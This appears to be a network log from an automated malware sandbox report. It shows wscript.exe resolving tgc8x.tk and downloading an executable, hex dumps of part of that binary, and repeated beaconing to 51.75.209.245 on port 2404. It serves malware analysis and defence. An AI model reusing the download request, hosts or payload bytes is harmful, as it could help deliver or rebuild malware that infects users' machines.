                                                                                                        Nov 3, 2022 23:35:57.801275015 CET4434971050.115.174.192192.168.2.6
                                                                                                        Nov 3, 2022 23:35:57.801289082 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:35:57.802061081 CET49710443192.168.2.650.115.174.192
                                                                                                        Nov 3, 2022 23:36:13.526469946 CET497112404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:16.551876068 CET497112404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:22.552428007 CET497112404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:35.572195053 CET497122404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:38.741400957 CET497122404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:44.757457972 CET497122404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:36:57.868833065 CET497132404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:00.883827925 CET497132404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:06.884363890 CET497132404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:19.902163982 CET497142404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:22.960484028 CET497142404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:29.061022043 CET497142404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:42.178406954 CET497152404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:45.192643881 CET497152404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:37:51.193121910 CET497152404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:04.496992111 CET497162404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:07.491359949 CET497162404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:13.491866112 CET497162404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:26.520153046 CET497172404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:29.665158033 CET497172404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:35.665662050 CET497172404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:48.683542013 CET497182404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:51.698323965 CET497182404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:38:57.699038982 CET497182404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:39:10.716201067 CET497192404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:39:13.731376886 CET497192404192.168.2.651.75.209.245
                                                                                                        Nov 3, 2022 23:39:19.732033014 CET497192404192.168.2.651.75.209.245
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 3, 2022 23:35:55.641128063 CET5859553192.168.2.68.8.8.8
                                                                                                        Nov 3, 2022 23:35:55.675801992 CET53585958.8.8.8192.168.2.6
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 3, 2022 23:35:55.641128063 CET192.168.2.68.8.8.80x1f1fStandard query (0)tgc8x.tkA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 3, 2022 23:35:55.675801992 CET8.8.8.8192.168.2.60x1f1fNo error (0)tgc8x.tk50.115.174.192A (IP address)IN (0x0001)false
                                                                                                        • tgc8x.tk
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.64971050.115.174.192443C:\Windows\System32\wscript.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-11-03 22:35:56 UTC0OUTGET /tt/VNZVNCXKKJSF.exe HTTP/1.1
                                                                                                        Accept: */*
                                                                                                        Accept-Language: en-us
                                                                                                        UA-CPU: AMD64
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                        Host: tgc8x.tk
                                                                                                        Connection: Keep-Alive
                                                                                                        2022-11-03 22:35:56 UTC0INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 03 Nov 2022 22:35:55 GMT
                                                                                                        Server: Apache
                                                                                                        Last-Modified: Thu, 03 Nov 2022 03:51:27 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 613184
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-msdownload
                                                                                                        2022-11-03 22:35:56 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 3a 63 63 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 22 09 00 00 3a 09 00 00 00 00 00 76 40 09 00 00 20 00 00 00 60 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:cc":v@ `@ `
                                                                                                        2022-11-03 22:35:56 UTC8INData Raw: 2a 00 00 03 30 09 00 06 00 00 00 00 00 00 00 2b 02 26 16 16 2a 00 00 03 30 09 00 0b 00 00 00 00 00 00 00 2b 02 26 16 00 28 60 00 00 0a 2a 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 02 03 28 61 00 00 0a 2a 00 00 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 28 34 00 00 06 25 26 2a 00 00 00 03 30 09 00 0e 00 00 00 00 00 00 00 2b 02 26 16 00 02 28 29 00 00 0a 25 26 2a 00 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 28 62 00 00 0a 25 26 2a 00 00 00 03 30 09 00 0d 00 00 00 00 00 00 00 2b 02 26 16 00 28 35 00 00 06 25 26 2a 00 00 00 03 30 09 00 10 00 00 00 00 00 00 00 2b 02 26 16 00 02 03 04 28 63 00 00 0a 25 26 2a 03 30 09 00 0e 00 00 00 00 00 00 00 2b 02 26 16 00 02 28 38 00 00 0a 25 26 2a 00 00 03 30 09 00 0b 00 00 00 00 00 00 00
                                                                                                        Data Ascii: *0+&*0+&(`*0+&(a*0+&(4%&*0+&()%&*0+&(b%&*0+&(5%&*0+&(c%&*0+&(8%&*0
                                                                                                        2022-11-03 22:35:56 UTC16INData Raw: f2 54 36 cc 69 8a 21 54 f0 a9 e8 e3 07 fc 07 c0 1c c8 35 91 0b 1d 46 f4 66 d6 ae f3 a8 0e 6a 95 20 97 a7 c5 df 03 ab 98 bc 80 ae 4f fe 78 7e 35 f2 7f 00 cd b4 f9 6a fe 4d 34 c2 0e 44 ec d8 b4 a0 49 74 af 84 8e 27 8c ba 9c 8d 6a 66 78 2b 34 57 be 60 31 07 b7 37 1a fe 57 a9 8d a9 6c b1 41 5a 49 43 54 64 62 af 86 9f 7e ed 5e d9 23 2b 65 2c 62 80 88 f5 46 ff 20 dc ca 7f fd 5f 2c f8 4b ed 42 0e 31 68 68 7e 6f fd b6 f4 56 14 f5 aa 92 1c 8f 5c 66 76 60 b7 b5 3d 1e 8b be 8f 7b e1 fb 3f 92 5f 94 ff 8b 42 c6 22 07 2b 2b f8 93 16 02 38 f1 45 2e ac 4e 98 66 b3 69 b4 04 17 35 5b 0a 3a 48 91 5b db c5 fd 4a c6 c4 cb 34 09 bd 37 2f 49 fa 8d 73 bb c5 ba 50 2e bf 58 ab f8 85 76 1a 52 c1 c4 e8 04 a8 e5 e4 b4 e8 6e e2 11 34 39 98 e7 73 d1 8e f4 be f7 67 1c bd 26 06 cb b1 f4
                                                                                                        Data Ascii: T6i!T5Ffj Ox~5jM4DIt'jfx+4W`17WlAZICTdb~^#+e,bF _,KB1hh~oV\fv`={?_B"++8E.Nfi5[:H[J47/IsP.XvRn49sg&
                                                                                                        2022-11-03 22:35:56 UTC23INData Raw: c1 41 e5 9c e4 b2 17 02 63 95 df 49 d6 d7 f1 8b 55 0c bb ac cd e6 a4 a0 f4 e1 68 a9 8f 36 56 d0 4d 76 e4 be 9b 83 72 18 5e dc e6 72 40 10 d1 e1 31 ee 6f 4f 2e 44 e8 fc d1 8a 4e 00 3c 8e 9b d9 0e 20 68 bc 6b 42 e8 d5 35 a0 8c 2c c6 4c 0c a9 be 8a 51 78 c9 ba 15 9a ba 85 08 f6 50 96 56 9a 24 45 38 53 3e 72 92 c0 fe c1 e6 3c df 02 b9 d1 2c 87 14 17 51 47 bf fe 43 43 66 68 fa 30 49 3d 1d 45 5f 29 ad 85 08 8d 3e 21 12 41 c8 0c db d3 15 be ef 9c 43 ea a2 73 2b 1a b3 3e 82 87 e6 f4 88 4e 18 cb 6f c4 ac de 35 28 f8 08 95 d6 88 4a eb f3 81 71 55 0c af ff a9 21 34 00 fd 78 14 f7 bf 16 cf b4 8d a0 5a 77 52 9b a0 49 cb 06 ca f9 24 a0 13 93 14 25 2e 4e dc 43 50 36 3b 18 5e c6 c9 6c 67 9d b5 6d be 57 1b 1a e1 71 38 8b 8e 0b d5 80 99 28 1c f3 6e b2 5e e3 98 67 67 13 b4
                                                                                                        Data Ascii: AcIUh6VMvr^r@1oO.DN< hkB5,LQxPV$E8S>r<,QGCCfh0I=E_)>!ACs+>No5(JqU!4xZwRI$%.NCP6;^lgmWq8(n^gg
                                                                                                        2022-11-03 22:35:56 UTC31INData Raw: 02 ba d3 11 dd 24 14 78 1e 56 89 7e 3f 78 11 8e 40 43 db da 84 ef 93 ed 2f ba 3c 86 20 be d3 b8 38 87 74 77 77 54 34 8b 36 41 0c fc 51 2e 19 69 d0 c7 48 a6 bc 74 b2 41 7e 2c eb 43 36 b2 24 e8 71 47 c6 c5 a8 8f fa 90 a5 b6 66 71 69 98 05 7b 65 61 02 c1 4d ec e3 07 83 4b f4 40 f3 c6 76 82 9c fa 01 4a e5 ac 2e a4 07 d1 8f 3c 5f 56 c2 72 27 a4 38 c3 c5 70 e7 b6 b8 16 da f2 7d 7a bc e6 16 2a e0 b5 51 64 38 65 50 72 94 f0 a9 49 a3 98 19 ce fe d0 65 31 24 21 8c 6a 76 71 af da 67 43 a5 a4 40 57 d3 a2 9d b0 27 84 dc 12 d6 a9 6f 50 ed b0 81 19 ca 2e 75 9c 28 a0 47 03 64 f9 86 42 fa 24 18 c0 95 29 ce 20 4e 0a 34 b7 92 db 71 fb 4a 49 43 ea 2e 2c c9 e6 f4 9d a5 bb b3 c4 28 9f 69 53 de 99 ad 7e 3e 42 dc 4b 84 01 05 82 a0 e3 6c 94 e9 c8 dc 5d b2 97 55 16 ca d5 a2 08 f2
                                                                                                        Data Ascii: $xV~?x@C/< 8twwT46AQ.iHtA~,C6$qGfqi{eaMK@vJ.<_Vr'8p}z*Qd8ePrIe1$!jvqgC@W'oP.u(GdB$) N4qJIC.,(iS~>BKl]U
                                                                                                        2022-11-03 22:35:56 UTC39INData Raw: 45 e8 29 4e c1 14 d5 5e c0 e5 84 db 49 ed 24 1e f4 08 d3 9f 62 dc 5b dc 5a ae b0 a8 0a 59 8f 0c ed 5d d6 9d 46 7c a0 8d 7c a6 44 d5 24 73 6e 24 f7 ac a2 db 0b a0 37 33 2f 5b 19 5e 6f 70 e7 3f 2a b8 98 84 bc 27 5b 1f 61 d7 4c e9 f9 d3 35 0f 3f 0b 70 44 70 50 30 db 19 b9 22 60 40 7c cc da 3a 78 2b d4 5b 65 a6 9b 5c b6 e9 2b a0 d9 32 d4 e4 76 ac bb 1e 45 31 ac fa ca bd 69 01 26 12 7f 0d 3d 17 d1 71 98 48 38 69 37 80 0e ff 13 c3 25 cc 96 20 79 30 8f 3a 8c ac 04 1e d4 7b 1d ac b3 2a d1 08 0c c9 c2 f9 a9 db 3a 7e df 0e 80 de 0d 13 12 13 9b 1c 42 7c 3f 00 8f a5 40 63 46 57 7a 37 db e0 4a ae bf 6b a7 f3 c0 3c f8 7a 91 24 5e a5 f7 a3 bf c8 69 ad b8 1b 0b 3c 97 0b ba 4f bc b9 0d 86 09 58 1d b1 85 61 bd 91 cf 14 18 1b 11 63 24 d1 91 ef 27 9e 3a e0 d7 19 24 5f 87 23
                                                                                                        Data Ascii: E)N^I$b[ZY]F||D$sn$73/[^op?*'[aL5?pDpP0"`@|:x+[e\+2vE1i&=qH8i7% y0:{*:~B|?@cFWz7Jk<z$^i<OXac$':$_#
                                                                                                        2022-11-03 22:35:56 UTC47INData Raw: 82 5b bd 4d f6 af fa 81 c9 8c 35 42 2e 1f e0 e6 14 59 23 07 34 2f a0 87 84 4e 33 23 0a 1f cb 9f a7 a1 35 65 82 99 dc 6c 52 2c 29 41 fb 11 f3 fe 59 77 7d b1 00 ff 5b 3a b6 05 80 3e e7 64 aa fb e8 08 52 75 d3 cd dc 53 c8 ef 0f 76 5a 37 33 89 1e 58 da c0 0f 38 b4 2f bc f7 3c 35 34 09 c9 d5 5f 33 ce a5 f5 7d 55 6d 68 51 0d 34 68 a5 4e a0 9c 1d c0 f6 62 df 07 be 56 0c e0 44 a7 d0 67 d7 09 35 69 53 5c 68 c6 6c 56 0e 1b 19 e6 1e fb 4c d5 81 0b 0d 84 34 d5 50 08 eb c5 ad 56 dd 69 19 a7 18 cd 18 cd f7 18 33 0e 9a ef d4 9d db 3b 42 7a fe a1 c6 a7 43 ef 41 8e ef 13 c2 58 e7 11 5b 58 94 50 55 b5 91 0e ea fe 40 e9 3c 55 98 0d 4c d5 b4 80 19 b0 8c 05 01 a3 b2 88 69 ad f2 cc 7a 25 5c f5 b4 b7 c0 f7 c1 5c ff f1 0a 94 7e 57 84 50 08 0c 6e 33 d9 21 87 8b e8 50 cc 00 c9 8f
                                                                                                        Data Ascii: [M5B.Y#4/N3#5elR,)AYw}[:>dRuSvZ73X8/<54_3}UmhQ4hNbVDg5iS\hlVL4PVi3;BzCAX[XPU@<ULiz%\\~WPn3!P
                                                                                                        2022-11-03 22:35:57 UTC55INData Raw: 55 87 0e 25 29 0d 7c 8b ec ff e6 8c 8a 83 db 08 a1 6d b1 26 82 2b d5 45 6b 84 4a fb 54 52 0d df d8 4a 60 d5 79 fe 9b 57 47 bf 43 96 ff a3 b1 57 c3 3d 95 45 25 31 65 f0 c0 ba e4 57 ab 13 52 da 8d c6 10 60 a6 f2 ec d9 24 89 5c 2c 25 fd ed 32 9c a6 e2 2d b4 ef c3 86 4a 39 90 c8 d5 b4 fd 73 71 7f ca 92 6c 50 26 88 3a 14 88 89 fa d3 ce d0 04 58 27 6c 59 94 81 d6 c0 c9 54 52 89 9c 26 f1 14 07 53 c0 46 fe 86 64 19 27 6d fa 6c 2a d0 e9 ef 6e 55 da 6d 9b 66 f6 37 91 d9 5f eb ef a5 f1 c5 33 a0 72 1d 95 6c 3a 6b 2a a8 68 77 16 6e eb 63 bd 3b fc 31 78 fd 61 95 3a d2 f2 3a 1e b0 4b 9e 13 de d6 ca 8a 02 11 6a 26 88 1c 90 e6 87 6e 7e 15 34 3a 4f bd 7e f0 f2 cc cb 59 3c 2c e2 05 c8 32 27 b0 b5 a7 5f 57 ba 2e f1 07 62 3b 91 5d 58 0f bc ea 38 a0 9a ed 90 42 97 f9 08 f9 e2
                                                                                                        Data Ascii: U%)|m&+EkJTRJ`yWGCW=E%1eWR`$\,%2-J9sqlP&:X'lYTR&SFd'ml*nUmf7_3rl:k*hwnc;1xa::Kj&n~4:O~Y<,2'_W.b;]X8B
                                                                                                        2022-11-03 22:35:57 UTC63INData Raw: d7 5e 4b 1d 26 5e 21 0d d2 74 86 98 25 2d 78 71 c3 7a c3 5d 6e 4f a5 3e d6 96 24 97 47 ed b8 76 52 ad 53 14 e8 2a 08 ab 23 76 41 dc e0 5c 0a f6 e1 36 3a cd 66 26 8b 0b ef c1 6f 3a db 07 0a c0 56 4f 2e 4e 6b cd cb 95 7d 01 15 18 09 2e ce 7d 0e bc 29 61 14 71 d2 b2 3f 4d 76 be 95 09 73 4d 98 09 5b 3b 3d 1e 8b 8c 4a 83 97 0e 21 b7 a7 12 f6 99 11 ef 04 22 99 e0 2a a9 11 ac 76 23 45 ab 7e fc 7d 1e 12 26 c8 cd 2b aa 3a 01 40 ad 0b 4f 2b ff 7a 7b 3d 9c e0 3d b7 2a 8a 1d 89 c4 d4 08 8c 99 0c 5b 0c d3 2c 6c 4b ce 63 a5 4c 83 92 8a cc 19 cc 6d 81 b8 0d 07 c1 d2 e2 9e 05 c3 b0 e9 e0 c8 d6 5b cc 39 af 8f 46 11 05 f1 78 97 1d 7b fd 39 ac e9 85 a7 2a 97 1e 36 bb 28 7d 83 44 35 79 c1 0b f8 1e b7 fa c7 7f 04 9a c6 87 19 6e ab 8e 8f dd 0e eb 65 6e 06 64 0c 0a c4 df 4c f9
                                                                                                        Data Ascii: ^K&^!t%-xqz]nO>$GvRS*#vA\6:f&o:VO.Nk}.})aq?MvsM[;=J!"*v#E~}&+:@O+z{==*[,lKcLm[9Fx{9*6(}D5ynendL
                                                                                                        2022-11-03 22:35:57 UTC70INData Raw: 43 4d 8a 00 55 4d d2 95 db d7 f3 d3 1b bc 89 a4 70 c7 39 17 c9 b1 51 0c 87 00 e2 35 e8 86 05 10 b1 e9 75 e5 9d f5 aa 91 02 9a 15 7c 93 ed 9d 25 da c4 4a fd c9 5b 60 a0 9d e5 9a 99 71 7e 3f fc 11 08 3e 17 86 4a 29 df 61 a2 83 74 5c b5 f8 87 68 07 d2 b5 39 14 4d 40 40 ff 19 e7 d9 1e d4 ba f8 34 e0 97 f2 4b b6 7d 59 ca 5c e1 0a 99 c6 9a 31 c6 8b 13 cd eb 94 f8 65 9b 0a 7d 75 47 e8 fe 73 1c b2 87 42 2c c8 78 ba 67 c4 b7 6e b7 ab 35 85 86 2c 76 5b 49 b1 8a b1 7e 9a 76 20 26 35 3f 99 4f f3 9c e7 ce ac 3c 4c 70 93 89 06 44 d1 dc 57 16 8c 6e dc 0d 24 c8 85 2e 96 42 c4 7b c5 e9 4c 2f b1 58 b2 e3 d9 5b 1c 71 a2 c7 0f 97 38 0b 98 ce 6f 56 1f 80 9c fa a3 2b ee 93 b7 d8 1a 28 5d fd 0e 32 de 96 21 ed bc 98 d8 fb 96 22 27 a5 c2 59 e2 f4 9a 3e 45 fb 33 5d a8 27 2f b8 2d
                                                                                                        Data Ascii: CMUMp9Q5u|%J[`q~?>J)at\h9M@@4K}Y\1e}uGsB,xgn5,v[I~v &5?O<LpDWn$.B{L/X[q8oV+(]2!"'Y>E3]'/-
                                                                                                        2022-11-03 22:35:57 UTC78INData Raw: 53 10 d0 ee 5e 07 59 b5 b8 99 36 61 70 07 c4 42 c0 e8 65 52 1b 48 06 83 bf 4f 9e c6 1c ed ef 12 01 18 57 2f fd 77 d5 9b e9 74 8c d7 b7 c4 58 f8 9d e8 a2 fe fc ab f0 8d 55 f6 81 37 55 48 c1 43 aa 9d 90 94 cb a0 b8 ce 12 05 67 26 fc 73 6c 46 6d f0 fd 30 e2 e2 1e a7 27 bd 48 91 b3 fe 21 8a 28 28 74 bb 9d 85 d2 20 0c ef 5d ed be 7b ab 51 66 28 8e cd 24 4f 58 10 ac 92 41 c1 99 dd 62 8f 1d c3 d9 1f e8 09 7f 79 e3 24 43 8d 0b f6 08 60 ae 6d c4 93 49 0e 54 a9 6c 28 4c b3 21 da b9 d2 ea c3 a4 ee 1b 1c 66 90 4e 97 02 9d b4 17 43 92 ea 40 5c a6 9e 43 39 b4 7f cc 40 95 6e ba 23 1d 7c c6 22 73 df a7 d8 77 f1 4f b8 e4 8b 43 fa 4e 85 9b 8a 74 bc c2 d0 43 8f c6 55 9d c7 bf a3 29 66 d8 f6 a0 d8 13 cd d3 09 31 64 2c a9 03 e8 7d 63 ea f2 30 76 5e dd 27 60 2c c5 53 e6 de be
                                                                                                        Data Ascii: S^Y6apBeRHOW/wtXU7UHCg&slFm0'H!((t ]{Qf($OXAby$C`mITl(L!fNC@\C9@n#|"swOCNtCU)f1d,}c0v^'`,S
                                                                                                        2022-11-03 22:35:57 UTC86INData Raw: f5 27 31 98 45 0e cd e3 00 39 d3 b8 e8 a8 28 c9 82 1f 4d d0 cd 54 2e 6a 17 5e 2e 11 0d 07 df 7b 10 4e 21 df d4 db 6c e6 32 6a f7 68 a0 7c d3 18 5a 96 a4 84 bb b2 4f 2c 05 a6 2a 7e 5c db 83 04 24 b2 8b 5b 79 ca 37 bb 2e 5b 33 3f 52 30 6a 8b 55 9b 10 51 fd eb ca 77 9b d8 b7 a5 6c a9 6d 1f 36 4e 94 56 b8 ad 53 25 78 f4 00 cf c8 76 32 50 ba f5 69 7f c0 d1 a8 44 f6 f8 24 dc 93 1d 34 5f e1 85 6b 65 f7 76 42 91 36 e2 24 82 0c af ff a6 f9 09 5e 75 1c 5f f1 eb 0f 88 a0 4e cd be 9f 0d 08 f8 64 77 36 e6 bf 78 a9 ef 4a 8b 64 d8 82 11 75 9d 45 f4 5c 15 a5 1f 9e 83 6d 2c d8 db 0f 73 a0 f6 2d fc 80 51 3f 71 c7 64 e6 45 03 02 7f be 9c df 87 aa 23 e2 3c 83 80 9b d2 7c 63 aa 85 22 ee 58 c7 5f 19 ea aa 5a 3d fa 0c e3 12 32 7a 73 f9 4c b9 34 a7 19 47 57 43 98 1c 0f db 05 65
                                                                                                        Data Ascii: '1E9(MT.j^.{N!l2jh|ZO,*~\$[y7.[3?R0jUQwlm6NVS%xv2PiD$4_kevB6$^u_Ndw6xJduE\m,s-Q?qdE#<|c"X_Z=2zsL4GWCe
                                                                                                        2022-11-03 22:35:57 UTC94INData Raw: 45 1f 01 2b e7 d3 8b c6 8d 2a ac 14 70 44 e8 2b a2 11 4e f2 91 e7 58 26 b4 93 73 e8 1e 94 14 e5 2e a7 55 46 48 66 f7 be 5c d1 e4 59 f0 f2 20 91 1f 56 95 42 98 ab 2d 9c 7f 5c 7e 25 60 6a 29 0a 2c a6 eb 20 6c 09 58 be e5 64 71 04 32 88 cf 05 ca 72 aa 13 7c 5a 6e 82 b0 c0 fc 41 b9 8d 62 7b f0 6e 5b 96 d9 a4 b4 05 78 fa d6 bc 69 05 ed 33 02 7c 40 e1 11 0b be a0 c9 cc de fa 80 52 f2 a4 eb 36 91 19 e8 16 18 3b 0f 0b ae 75 6e 93 27 11 f9 0b 6a 15 84 78 d4 98 57 4b 54 57 16 5a b9 51 7f 9d 53 56 9d f2 84 ce 4c 7e 93 88 84 88 5e 65 f6 9c 6c 68 71 bc 6b c0 20 c5 57 8a e9 c8 0f 64 fd dd 88 d1 1d 77 03 86 a5 41 a6 74 12 57 d6 39 db c9 56 30 1b 3b d6 45 97 1e 5a eb 12 34 2f 23 b2 6e 45 ab 2e 98 c1 12 43 fb 95 72 51 34 f9 37 4d 09 fa 60 4c 20 32 d3 47 41 11 a5 e6 dd cf
                                                                                                        Data Ascii: E+*pD+NX&s.UFHf\Y VB-\~%`j), lXdq2r|ZnAb{n[xi3|@R6;un'jxWKTWZQSVL~^elhqk WdwAtW9V0;EZ4/#nE.CrQ47M`L 2GA
                                                                                                        2022-11-03 22:35:57 UTC102INData Raw: 7a 43 a4 de 0d 17 bb ce 03 d4 29 cd 2f 15 10 d8 73 27 a7 dd 54 6d 2a 5e 3a e4 a2 18 5b 94 11 01 a0 21 01 99 39 09 86 ba 20 54 41 b9 ae 51 97 69 b1 d5 4b a5 c5 20 b8 6c 46 54 0c 69 cb 70 5e ea a5 08 e6 62 92 fc fd 14 33 ac 90 fb 7a bd 24 26 9f 60 95 bf b9 ab 7b 4c 41 23 7d 0a c6 1a c7 5a 8d 05 01 bd b1 24 95 0a 4f 48 d1 c3 38 6a 60 18 73 27 a7 dd 54 6d 2a 5e 54 24 89 41 32 79 c4 a8 e3 2e 05 e5 ca 75 0b b9 31 0b f6 6d c4 d7 68 dc 9f bf d5 4f 4c 8c ae 8e ed fb 50 6c 6e 96 f1 0c 2c 2c 07 23 dd 6c 83 5d ae e2 8e 05 4c de 6e 52 a3 4d 09 f2 52 c7 ae 1e b7 42 16 ca ef 23 b7 4e 06 5c 92 e6 40 b4 bd 08 76 9e cd cf fd 67 70 9b 52 12 15 14 81 7c 1b 3d 91 b7 7b 17 47 0a 8f fd af ca 3a be 83 b8 86 dc 73 63 48 2d 53 dd d1 6e 0e 1c 09 2d 1c 2d d5 7d 41 1f 05 75 bd be 59
                                                                                                        Data Ascii: zC)/s'Tm*^:[!9 TAQiK lFTip^b3z$&`{LA#}Z$OH8j`s'Tm*^T$A2y.u1mhOLPln,,#l]LnRMRB#N\@vgpR|={G:scH-Sn--}AuY
                                                                                                        2022-11-03 22:35:57 UTC109INData Raw: f9 7e e0 56 4b 91 a6 ec 96 4f db 69 bd fc 97 7b ef 3b e7 a6 44 c4 31 9e c7 86 1e 1c 09 78 9f da b4 ae ee dd 36 35 a4 da fc db dc 08 3b 92 7f 37 f4 76 65 cc ff 9d 2e 48 4f a0 6a f4 68 68 c2 9f 94 6b 70 4b 5d 69 cf 57 47 df 46 06 ad 91 97 8e 95 ce f7 93 23 5d 2f 10 8a 0a 5a 73 5e b2 c8 92 c1 c9 ed af 49 58 95 1a 42 ab 64 96 39 3d 04 08 09 a5 d4 22 fd 0c dd 9c e8 fe 06 e9 76 1c f9 d6 a4 34 9f 82 54 4a 6d b1 ba d4 f8 d3 24 be 0b 85 68 c3 9a fb c5 c2 21 ca 78 b9 83 ca 43 aa f5 08 48 88 df 1f b3 6e 35 d6 b0 95 14 00 19 02 04 95 f5 31 e1 44 f0 72 f6 47 e5 5d d9 19 c8 49 06 53 8e e6 37 7f a3 23 cb b7 72 36 2e 03 a5 4e 2e 8b d6 b3 c8 6c 98 30 51 a7 68 b4 f4 bb e9 f4 3b fe bd 22 e6 7b 52 fe 3d dd 9c 72 7c ba b6 b9 49 97 88 0d 62 90 db 0f 99 08 55 fd f1 35 ac a3 a1
                                                                                                        Data Ascii: ~VKOi{;D1x65;7ve.HOjhhkpK]iWGF#]/Zs^IXBd9="v4TJm$h!xCHn51DrG]IS7#r6.N.l0Qh;"{R=r|IbU5
                                                                                                        2022-11-03 22:35:57 UTC117INData Raw: 04 bd f6 de ce 02 64 c8 04 52 21 c6 91 14 15 0c 85 66 6e 4a 58 4a b6 e3 cc e0 14 4b 2e f6 44 3d bf 8f 9c 86 4c e3 83 4a 95 74 e4 4e 36 3f 92 b5 e7 00 c6 45 14 0b 9f c8 8f 39 ef a1 d4 c3 e2 77 93 59 27 89 64 20 69 9c 2f 7e 83 03 54 e5 f1 d3 75 18 55 71 4c dd d1 50 29 ad 3c b9 63 ed 65 f2 1a 60 44 8c a0 0e 6e 81 0d 58 fb 30 2b 2b f3 00 66 c5 a4 33 10 90 bb 8c 53 77 9e e3 da 7c d3 7d 26 cb bf c9 a0 51 6c f9 90 e4 63 8c d5 4a c2 47 9e 94 f8 ac ca 41 30 d3 6c b5 d6 db 56 c9 c2 f8 6b 5d 59 85 dd aa 07 50 1f 49 64 87 db 46 42 a5 1b 6d bf 28 e1 54 24 52 a3 1f e1 95 84 28 63 0d fc 7d 18 cb 0a b5 97 73 8f 59 b2 2d c0 e8 77 cc 2c f7 0e 05 1c 42 22 c2 75 f6 5b c5 2e d1 46 48 26 01 86 31 da 33 13 9a 11 cd df 96 04 c3 a5 4c e8 46 0c 79 b7 53 75 42 d3 5d af 13 76 21 5d
                                                                                                        Data Ascii: dR!fnJXJK.D=LJtN6?E9wY'd i/~TuUqLP)<ce`DnX0++f3Sw|}&QlcJGA0lVk]YPIdFBm(T$R(c}sY-w,B"u[.FH&13LFySuB]v!]
                                                                                                        2022-11-03 22:35:57 UTC125INData Raw: e0 70 b0 7c d5 2a 1a b7 6b 56 14 aa bf fa 29 a7 fd f5 4b 78 69 64 53 35 aa 27 44 ce 69 dd 9b c4 3a 4d 09 eb f6 49 ad 33 cb a1 0a 9c 7c 18 20 64 45 dc 4e 27 6e a0 4b e2 b7 eb e1 f7 08 dc 04 be 0b 16 55 30 13 45 1c 7b f9 15 77 78 ec c8 fb fe bb b2 4a c9 03 02 ce cb 0f 10 90 25 c2 7d 5b ee 5b 8f 31 db 01 44 2a 12 3e d1 14 53 b3 35 12 69 4f a3 39 88 53 77 ff 5c 18 00 06 e4 06 00 62 2c 10 64 57 47 a7 66 22 a4 bd b7 48 50 02 12 81 1d 2e 04 7c 5f 79 8c 85 34 3d ad 26 fe 6e 94 67 12 26 4e 5c 58 87 0c 59 a6 a9 75 86 73 9a 4b ab b2 92 08 d3 34 e1 a9 c0 1e 5a c7 48 d5 c2 f6 08 8b 80 2f 0f f4 f2 7f c3 25 30 9a b6 a8 0d f4 f0 dd a4 52 84 73 fd 4f c1 85 5b 83 21 5b 8d 99 d2 79 05 e0 dc 9f 66 12 25 a5 59 76 28 dd 71 f7 8d de 35 b7 c7 93 6f e4 86 93 37 91 fa b8 25 b7 0e
